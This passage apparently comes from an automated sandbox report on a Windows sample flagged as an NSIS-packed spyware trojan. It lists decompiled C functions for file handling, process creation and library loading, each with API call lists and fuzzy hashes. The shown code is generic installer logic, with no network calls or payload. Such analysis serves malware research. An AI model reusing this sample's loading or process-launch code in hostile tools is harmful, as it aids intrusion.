            • WaitForSingleObject.KERNEL32(?,00000064,00000000,00000000,?,?,00401F9F,?,?,?,?,?,?), ref: 00406AF7
            • WaitForSingleObject.KERNEL32(?,00000064,0000000F,?,?,00401F9F,?,?,?,?,?,?), ref: 00406B0C
            • GetExitCodeProcess.KERNELBASE(?,?), ref: 00406B19
            Memory Dump Source
            • Source File: 00000000.00000002.242506590.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.242502803.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242513299.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242517689.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242521683.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242769016.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242777565.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242784373.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242790346.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242830214.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242835324.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242841112.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
            Similarity
            • API ID: ObjectSingleWait$CodeExitProcess
            • String ID:
            • API String ID: 2567322000-0
            • Opcode ID: 283581236024a182d03fca7383c40b0f2a2dbb9aa7d2600e4fb29ca982165da2
            • Instruction ID: 2c972b7a35bd62db52b15041da2731f4b89024a3c017fe3bef96d42d01d66162
            • Opcode Fuzzy Hash: 283581236024a182d03fca7383c40b0f2a2dbb9aa7d2600e4fb29ca982165da2
            • Instruction Fuzzy Hash: 67E09271600218BBEB00AB54DD05E9E7F7EDB44700F110032F601F6190C6B1EE22DAA4
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 53%
            			E00406045(void* __eflags, intOrPtr _a4) {
            				int _t11;
            				signed char* _t12;
            				long _t16;
            				intOrPtr _t18;
            				intOrPtr* _t21;
            				signed int _t23;
            
            				E0040666E(0x7a4790, _a4);
            				_t21 = E00405FE8(0x7a4790);
            				if(_t21 != 0) {
            					E004068F5(_t21);
            					if(( *0x7a8ab8 & 0x00000080) == 0) {
            						L5:
            						_t23 = _t21 - 0x7a4790 >> 1;
            						while(1) {
            							_t11 = lstrlenW(0x7a4790);
            							_push(0x7a4790);
            							if(_t11 <= _t23) {
            								break;
            							}
            							_t12 = E004069A4();
            							if(_t12 == 0 || ( *_t12 & 0x00000010) != 0) {
            								E00405F89(0x7a4790);
            								continue;
            							} else {
            								goto L1;
            							}
            						}
            						E00405F3D();
            						_t16 = GetFileAttributesW(??); // executed
            						return 0 | _t16 != 0xffffffff;
            					}
            					_t18 =  *_t21;
            					if(_t18 == 0 || _t18 == 0x5c) {
            						goto L1;
            					} else {
            						goto L5;
            					}
            				}
            				L1:
            				return 0;
            			}









            0x00406051
            0x0040605c
            0x00406060
            0x00406067
            0x00406073
            0x00406083
            0x00406085
            0x0040609d
            0x0040609e
            0x004060a5
            0x004060a6
            0x00000000
            0x00000000
            0x00406089
            0x00406090
            0x00406098
            0x00000000
            0x00000000
            0x00000000
            0x00000000
            0x00406090
            0x004060a8
            0x004060ae
            0x00000000
            0x004060bc
            0x00406075
            0x0040607b
            0x00000000
            0x00000000
            0x00000000
            0x00000000
            0x0040607b
            0x00406062
            0x00000000

            APIs
              • Part of subcall function 0040666E: lstrcpynW.KERNEL32(?,?,00000400,004037B6,007A7AA0,NSIS Error), ref: 0040667B
              • Part of subcall function 00405FE8: CharNextW.USER32(?,?,007A4790,?,0040605C,007A4790,007A4790,76CDFAA0,?,76CDF560,00405D9A,?,76CDFAA0,76CDF560,00000000), ref: 00405FF6
              • Part of subcall function 00405FE8: CharNextW.USER32(00000000), ref: 00405FFB
              • Part of subcall function 00405FE8: CharNextW.USER32(00000000), ref: 00406013
            • lstrlenW.KERNEL32(007A4790,00000000,007A4790,007A4790,76CDFAA0,?,76CDF560,00405D9A,?,76CDFAA0,76CDF560,00000000), ref: 0040609E
            • GetFileAttributesW.KERNELBASE(007A4790,007A4790,007A4790,007A4790,007A4790,007A4790,00000000,007A4790,007A4790,76CDFAA0,?,76CDF560,00405D9A,?,76CDFAA0,76CDF560), ref: 004060AE
            Memory Dump Source
            • Source File: 00000000.00000002.242506590.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.242502803.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242513299.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242517689.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242521683.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242769016.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242777565.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242784373.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242790346.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242830214.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242835324.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242841112.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
            Similarity
            • API ID: CharNext$AttributesFilelstrcpynlstrlen
            • String ID:
            • API String ID: 3248276644-0
            • Opcode ID: fa3c9235a4b418ee68dfdff8e4277a43b5875b963336551736dc5840a4575c34
            • Instruction ID: 38ed1c6f7611cbdad0e8a1dc3f16fb44af04154f1bcb09577380b12bcb23f66f
            • Opcode Fuzzy Hash: fa3c9235a4b418ee68dfdff8e4277a43b5875b963336551736dc5840a4575c34
            • Instruction Fuzzy Hash: 31F0282A148A5219D622B33A0D05ABF05458EC2354B0B063FFC53B12D1DF7C897385BF
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 69%
            			E00401389(signed int _a4) {
            				intOrPtr* _t6;
            				void* _t8;
            				void* _t10;
            				signed int _t11;
            				void* _t12;
            				signed int _t16;
            				signed int _t17;
            				void* _t18;
            
            				_t17 = _a4;
            				while(_t17 >= 0) {
            					_t6 = _t17 * 0x1c +  *0x7a8ad0;
            					if( *_t6 == 1) {
            						break;
            					}
            					_push(_t6); // executed
            					_t8 = E00401434(); // executed
            					if(_t8 == 0x7fffffff) {
            						return 0x7fffffff;
            					}
            					_t10 = E0040136D(_t8);
            					if(_t10 != 0) {
            						_t11 = _t10 - 1;
            						_t16 = _t17;
            						_t17 = _t11;
            						_t12 = _t11 - _t16;
            					} else {
            						_t12 = _t10 + 1;
            						_t17 = _t17 + 1;
            					}
            					if( *((intOrPtr*)(_t18 + 0xc)) != 0) {
            						 *0x7a7a8c =  *0x7a7a8c + _t12;
            						SendMessageW( *(_t18 + 0x18), 0x402, MulDiv( *0x7a7a8c, 0x7530,  *0x7a7a74), 0);
            					}
            				}
            				return 0;
            			}











            0x0040138a
            0x004013fa
            0x0040139b
            0x004013a0
            0x00000000
            0x00000000
            0x004013a2
            0x004013a3
            0x004013ad
            0x00000000
            0x00401404
            0x004013b0
            0x004013b7
            0x004013bd
            0x004013be
            0x004013c0
            0x004013c2
            0x004013b9
            0x004013b9
            0x004013ba
            0x004013ba
            0x004013c9
            0x004013cb
            0x004013f4
            0x004013f4
            0x004013c9
            0x00000000

            APIs
            • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
            • SendMessageW.USER32(?,00000402,00000000), ref: 004013F4
            Memory Dump Source
            • Source File: 00000000.00000002.242506590.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.242502803.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242513299.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242517689.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242521683.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242769016.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242777565.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242784373.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242790346.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242830214.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242835324.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242841112.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
            Similarity
            • API ID: MessageSend
            • String ID:
            • API String ID: 3850602802-0
            • Opcode ID: aa6623dc5ba143c6751f89f60c6741bc3c59239a488c9da53ae18f0a51eeece7
            • Instruction ID: 0d0e525a89db022a3713d7d40a62d3a92fa7a1992dda9c0477917c3d4d329065
            • Opcode Fuzzy Hash: aa6623dc5ba143c6751f89f60c6741bc3c59239a488c9da53ae18f0a51eeece7
            • Instruction Fuzzy Hash: 5901F432624220ABE7094B389D05B2A3698E751315F10C67FF851F79F1EA78CC02DB4C
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E00405C51(WCHAR* _a4) {
            				struct _PROCESS_INFORMATION _v20;
            				int _t7;
            
            				0x7a4f90->cb = 0x44;
            				_t7 = CreateProcessW(0, _a4, 0, 0, 0, 0x4000000, 0, 0, 0x7a4f90,  &_v20); // executed
            				if(_t7 != 0) {
            					CloseHandle(_v20.hThread);
            					return _v20.hProcess;
            				}
            				return _t7;
            			}





            0x00405c5a
            0x00405c7a
            0x00405c82
            0x00405c87
            0x00000000
            0x00405c8d
            0x00405c91

            APIs
            Memory Dump Source
            • Source File: 00000000.00000002.242506590.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.242502803.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242513299.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242517689.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242521683.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242769016.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242777565.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242784373.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242790346.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242830214.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242835324.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242841112.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
            Similarity
            • API ID: CloseCreateHandleProcess
            • String ID:
            • API String ID: 3712363035-0
            • Opcode ID: a96f74c6d97d8fddc601bdb2e7485f3ed7604f934fc57424aef617628e035306
            • Instruction ID: 1fa2a79eb519949bf7d30246b9e4481379e3d274eb9e55713eae969c2627164f
            • Opcode Fuzzy Hash: a96f74c6d97d8fddc601bdb2e7485f3ed7604f934fc57424aef617628e035306
            • Instruction Fuzzy Hash: 6AE0B6F4A00209BFEB00DFA4EE09F7B7AACEB44604F408525BD54F2191D7B9A8148A78
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E00406A3B(signed int _a4) {
            				struct HINSTANCE__* _t5;
            				signed int _t10;
            
            				_t10 = _a4 << 3;
            				_t8 =  *(_t10 + 0x40a410);
            				_t5 = GetModuleHandleA( *(_t10 + 0x40a410));
            				if(_t5 != 0) {
            					L2:
            					return GetProcAddress(_t5,  *(_t10 + 0x40a414));
            				}
            				_t5 = E004069CB(_t8); // executed
            				if(_t5 == 0) {
            					return 0;
            				}
            				goto L2;
            			}





            0x00406a43
            0x00406a46
            0x00406a4d
            0x00406a55
            0x00406a61
            0x00000000
            0x00406a68
            0x00406a58
            0x00406a5f
            0x00000000
            0x00406a70
            0x00000000

            APIs
            • GetModuleHandleA.KERNEL32(?,00000020,?,00403756,0000000B), ref: 00406A4D
            • GetProcAddress.KERNEL32(00000000,?), ref: 00406A68
              • Part of subcall function 004069CB: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004069E2
              • Part of subcall function 004069CB: wsprintfW.USER32 ref: 00406A1D
              • Part of subcall function 004069CB: LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406A31
            Memory Dump Source
            • Source File: 00000000.00000002.242506590.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.242502803.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242513299.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242517689.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242521683.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242769016.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242777565.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242784373.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242790346.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242830214.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242835324.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242841112.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
            Similarity
            • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
            • String ID:
            • API String ID: 2547128583-0
            • Opcode ID: 2c5be687f5fa61a336a49914f64a515c5dfea5ee9312c993601bf5eaa599f6ad
            • Instruction ID: 8bc6c373ae4a51b79335f269ef4a09a4b84a1385f2c3991dd3566e210a560b2e
            • Opcode Fuzzy Hash: 2c5be687f5fa61a336a49914f64a515c5dfea5ee9312c993601bf5eaa599f6ad
            • Instruction Fuzzy Hash: 56E0867660421066D610A6755D48D3773B89BC6710306843EF556F2040DB38DC359A6D
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 68%
            			E0040615E(WCHAR* _a4, long _a8, long _a12) {
            				signed int _t5;
            				void* _t6;
            
            				_t5 = GetFileAttributesW(_a4); // executed
            				asm("sbb ecx, ecx");
            				_t6 = CreateFileW(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
            				return _t6;
            			}





            0x00406162
            0x0040616f
            0x00406184
            0x0040618a

            APIs
            • GetFileAttributesW.KERNELBASE(00000003,00403113,C:\Users\user\Desktop\SecuriteInfo.com.Trojan.NSISX.Spy.Gen.2.8452.exe,80000000,00000003), ref: 00406162
            • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00406184
            Memory Dump Source
            • Source File: 00000000.00000002.242506590.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.242502803.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242513299.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242517689.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242521683.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242769016.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242777565.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242784373.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242790346.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242830214.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242835324.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242841112.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
            Similarity
            • API ID: File$AttributesCreate
            • String ID:
            • API String ID: 415043291-0
            • Opcode ID: bc48b18717e6d0ecb647aea7fc0ab07bebcbb2e2e3a0bd9572a83b91cd6509df
            • Instruction ID: 0e1b57c135d9ed337dcee0f1630d7a3ffd6699826ab823f4ff8c6da5104765b0
            • Opcode Fuzzy Hash: bc48b18717e6d0ecb647aea7fc0ab07bebcbb2e2e3a0bd9572a83b91cd6509df
            • Instruction Fuzzy Hash: DCD09E71254201AFEF0D8F20DF16F2E7AA2EB94B04F11952CB682940E1DAB15C15AB19
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E00406139(WCHAR* _a4) {
            				signed char _t3;
            				signed char _t7;
            
            				_t3 = GetFileAttributesW(_a4); // executed
            				_t7 = _t3;
            				if(_t7 != 0xffffffff) {
            					SetFileAttributesW(_a4, _t3 & 0x000000fe); // executed
            				}
            				return _t7;
            			}





            0x0040613e
            0x00406144
            0x00406149
            0x00406152
            0x00406152
            0x0040615b

            APIs
            • GetFileAttributesW.KERNELBASE(?,?,00405D3E,?,?,00000000,00405F14,?,?,?,?), ref: 0040613E
            • SetFileAttributesW.KERNELBASE(?,00000000), ref: 00406152
            Memory Dump Source
            • Source File: 00000000.00000002.242506590.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.242502803.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242513299.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242517689.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242521683.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242769016.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242777565.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242784373.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242790346.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242830214.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242835324.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242841112.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
            Similarity
            • API ID: AttributesFile
            • String ID:
            • API String ID: 3188754299-0
            • Opcode ID: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
            • Instruction ID: 4d59290e3aa44cd58c99826dd52d8cee581d87a9a88888807f370448835cb7c6
            • Opcode Fuzzy Hash: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
            • Instruction Fuzzy Hash: C2D0C972504130ABC2502728AE0889ABB55EB642717014A35F9A5A62B0CB304C628A98
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E00405C1C(WCHAR* _a4) {
            				int _t2;
            
            				_t2 = CreateDirectoryW(_a4, 0); // executed
            				if(_t2 == 0) {
            					return GetLastError();
            				}
            				return 0;
            			}




            0x00405c22
            0x00405c2a
            0x00000000
            0x00405c30
            0x00000000

            APIs
            • CreateDirectoryW.KERNELBASE(?,00000000,00403639,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403929), ref: 00405C22
            • GetLastError.KERNEL32 ref: 00405C30
            Memory Dump Source
            • Source File: 00000000.00000002.242506590.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.242502803.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242513299.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242517689.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242521683.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242769016.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242777565.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242784373.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242790346.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242830214.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242835324.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242841112.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
            Similarity
            • API ID: CreateDirectoryErrorLast
            • String ID:
            • API String ID: 1375471231-0
            • Opcode ID: 3d774f31bfc7c5d70b6f8c035fc875d1b29c99f0800ffc9da4ab7b914865a185
            • Instruction ID: 9b4f5430b3bbe22f75525a6a8288bb62ac5ef9e6fdb3d88c50eeb6a92616e2bf
            • Opcode Fuzzy Hash: 3d774f31bfc7c5d70b6f8c035fc875d1b29c99f0800ffc9da4ab7b914865a185
            • Instruction Fuzzy Hash: 1EC04C71218609AEE7705B209F0DB177A949B50741F11443A6686F40A0DA788455D92D
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E00406210(void* _a4, void* _a8, long _a12) {
            				int _t7;
            				long _t11;
            
            				_t11 = _a12;
            				_t7 = WriteFile(_a4, _a8, _t11,  &_a12, 0); // executed
            				if(_t7 == 0 || _t11 != _a12) {
            					return 0;
            				} else {
            					return 1;
            				}
            			}





            0x00406214
            0x00406224
            0x0040622c
            0x00000000
            0x00406233
            0x00000000
            0x00406235

            APIs
            • WriteFile.KERNELBASE(?,00000000,00000000,00000000,00000000,0078E728,0078B730,0040357F,0078B730,0078E728,0jy,00793730,00004000,?,00000000,004033A9), ref: 00406224
            Memory Dump Source
            • Source File: 00000000.00000002.242506590.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.242502803.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242513299.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242517689.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242521683.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242769016.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242777565.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242784373.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242790346.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242830214.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242835324.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242841112.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
            Similarity
            • API ID: FileWrite
            • String ID:
            • API String ID: 3934441357-0
            • Opcode ID: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
            • Instruction ID: f08cceda346ec9350f11c22fcf513fe3bc01c5f1c17db0892cf19a12a1b56e8c
            • Opcode Fuzzy Hash: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
            • Instruction Fuzzy Hash: 95E08C3220026AABCF10AE698C00AEB3B6CFB05360F01447AFE56E7040D334E83087A5
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E004061E1(void* _a4, void* _a8, long _a12) {
            				int _t7;
            				long _t11;
            
            				_t11 = _a12;
            				_t7 = ReadFile(_a4, _a8, _t11,  &_a12, 0); // executed
            				if(_t7 == 0 || _t11 != _a12) {
            					return 0;
            				} else {
            					return 1;
            				}
            			}





            0x004061e5
            0x004061f5
            0x004061fd
            0x00000000
            0x00406204
            0x00000000
            0x00406206

            APIs
            • ReadFile.KERNELBASE(?,00000000,00000000,00000000,00000000,00793730,0078B730,004035FB,?,?,004034FF,00793730,00004000,?,00000000,004033A9), ref: 004061F5
            Memory Dump Source
            • Source File: 00000000.00000002.242506590.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.242502803.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242513299.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242517689.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242521683.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242769016.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242777565.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242784373.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242790346.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242830214.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242835324.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242841112.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
            Similarity
            • API ID: FileRead
            • String ID:
            • API String ID: 2738559852-0
            • Opcode ID: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
            • Instruction ID: a9904075eeec40e7e939a2dde13f9046a7e38eb284923ea40542f090f2fca858
            • Opcode Fuzzy Hash: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
            • Instruction Fuzzy Hash: 66E08632500219ABDF106E519C04AEB375CFB01350F01487AFD22E2151E231E87187A8
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E004035FE(long _a4) {
            				long _t2;
            
            				_t2 = SetFilePointer( *0x40a018, _a4, 0, 0); // executed
            				return _t2;
            			}




            0x0040360c
            0x00403612

            APIs
            • SetFilePointer.KERNELBASE(00000000,00000000,00000000,004032FC,?), ref: 0040360C
            Memory Dump Source
            • Source File: 00000000.00000002.242506590.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.242502803.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242513299.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242517689.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242521683.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
